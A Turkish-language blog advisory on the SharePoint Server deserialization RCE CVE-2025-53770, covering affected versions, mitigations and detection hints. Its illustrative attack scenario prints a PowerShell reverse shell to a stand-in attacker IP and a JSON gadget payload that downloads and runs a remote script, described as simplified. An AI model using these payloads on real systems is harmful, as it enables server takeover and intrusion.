Microsoft SharePoint Server'da Uzaktan Kod Çalıştırma

byCrow -

 Kritik SharePoint RCE Açığı – Azaltma ve Yama
Microsoft SharePoint

 Microsoft SharePoint Server'da Uzaktan Kod Çalıştırma

Genel Bakış

Microsoft SharePoint Server'ın şirket içi (on-premises) sürümlerinde, yetkisiz bir saldırganın ağ üzerinden kod çalıştırmasına olanak tanıyan kritik bir güvenlik açığı (CVE-2025-53770) tespit edildi. Microsoft, bu açığın aktif olarak istismar edildiğini doğruladı ve bu nedenle SharePoint kullanan kuruluşlar için yüksek risk oluşturuyor.

CVSS 9.8 (KRİTİK) puanına sahip bu açık, ağ üzerinden kimlik doğrulama gerektirmeden sömürülebilir durumda. Microsoft resmi bir güncelleme üzerinde çalışıyor, ancak geçici önlemler yayınladı.


Teknik Detaylar

Güvenlik Açığı Türü: Güvenilmeyen Verinin Deserializasyonu

SharePoint, güvenilmeyen verileri yeterli doğrulama yapmadan işlediğinde, uzaktan kod çalıştırma (RCE) mümkün hale geliyor. Saldırganlar, özel hazırlanmış serileştirilmiş nesneleri SharePoint’e göndererek sistemi ele geçirebiliyor.

Saldırı Vektörü

  • Ağ tabanlı istismar: Saldırganların kimlik doğrulaması yapması gerekmiyor.
  • Web istekleriyle sömürülebilir: Özel hazırlanmış HTTP istekleriyle SharePoint uç noktalarına zararlı yük gönderilebiliyor.

Etkilenen Sürümler

  • Microsoft SharePoint Server 2019
  • Microsoft SharePoint Server 2016
  • Microsoft SharePoint Server 2013 (hâlâ kullanılıyorsa)
  • Muhtemelen önceki sürümler (araştırma devam ediyor)


Örnek Saldırı Senaryosu

Adım 1: Keşif

Bir saldırgan, şirket ağında https://sharepoint.sirket.com adresinde çalışan bir SharePoint Server 2019 örneği tespit ediyor.

Adım 2: Zararlı Yükün Hazırlanması

Saldırgan, SharePoint’in güvenlik açığı bulunan deserializasyon işlevini kullanarak ters kabuk (reverse shell) başlatacak bir komut oluşturuyor:

# Örnek bir deserializasyon yükü (basitleştirilmiş hali)
$payload = @{
    "__type" = "System.Windows.Data.ObjectDataProvider, PresentationFramework",
    "MethodName" = "Start",
    "ObjectInstance" = @{
        "__type" = "System.Diagnostics.Process, System",
        "StartInfo" = @{
            "__type" = "System.Diagnostics.ProcessStartInfo, System",
            "FileName" = "cmd.exe",
            "Arguments" = "/c powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('saldırgan-ip',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""
        }
    }
}
$jsonPayload = ConvertTo-Json $payload -Depth 10

Adım 3: Yükün Gönderilmesi

Saldırgan, hazırladığı yükü SharePoint’in hassas bir API uç noktasına (/_api/web/lists) gönderiyor:

POST /_api/web/lists HTTP/1.1
Host: sharepoint.sirket.com
Content-Type: application/json
Accept: application/json

{
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
    "MethodName": "Start",
    "ObjectInstance": {
        "__type": "System.Diagnostics.Process, System",
        "StartInfo": {
            "__type": "System.Diagnostics.ProcessStartInfo, System",
            "FileName": "cmd.exe",
            "Arguments": "/c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://saldırgan-sunucu/shell.ps1')\""
        }
    }
}

Adım 4: Uzaktan Erişim Sağlanması

  • Başarılı olursa, PowerShell reverse shell çalışarak saldırganın sunucusuna bağlanır.
  • Saldırgan artık SharePoint sunucusunda tam kontrol sağlar ve ağ içinde yatay hareket edebilir.

Geçici Önlemler (Yama Çıkana Kadar)

Microsoft, riski azaltmak için aşağıdaki acil önlemleri öneriyor:

  1. SharePoint'te Deserializasyonu Devre Dışı Bırakın

    • Microsoft’un geçici çözümünü uygulayın.
    • Güvenlik duvarı kurallarıyla SharePoint API uç noktalarına erişimi kısıtlayın.

  2. Ağ Segmentasyonu

    • SharePoint sunucularını sıkı güvenlik duvarı kuralları arkasına alın.
    • Yalnızca güvenilen IP’lere erişim izni verin.

  3. Saldırı Girişimlerini İzleyin

    • IIS loglarında /_api/* gibi uç noktalara şüpheli POST isteklerini kontrol edin.
    • w3wp.exe’den başlatılan cmd.exe veya powershell.exe işlemlerini gözlemleyin.

  4. Yama Çıkar Çıkmaz Uygulayın

    • Microsoft’un yayınlayacağı güncellemeyi en kısa sürede kurun.


Sonuç

CVE-2025-53770, Microsoft SharePoint Server’da aktif olarak istismar edilen kritik bir açık. Kuruluşların derhal önlem alması gerekiyor. Açığın sömürülmesi, veri ihlalleri, fidye yazılım saldırıları veya sunucunun tamamen ele geçirilmesiyle sonuçlanabilir.

Microsoft’un resmi yamasını beklerken geçici önlemleri uygulayın ve sistemlerinizi izlemeye alın.

Yapılacaklar:
✅ Önlemleri şimdi uygulayın.
✅ Logları saldırı girişimleri için kontrol edin.
✅ Acil yama için hazırlık yapın.

Detaylar için Microsoft’un resmi duyurusunu takip edin: Microsoft Güvenlik Yanıt Merkezi (MSRC).



Tags

Yorum Gönder

Daha yeni Daha eski

İletişim Formu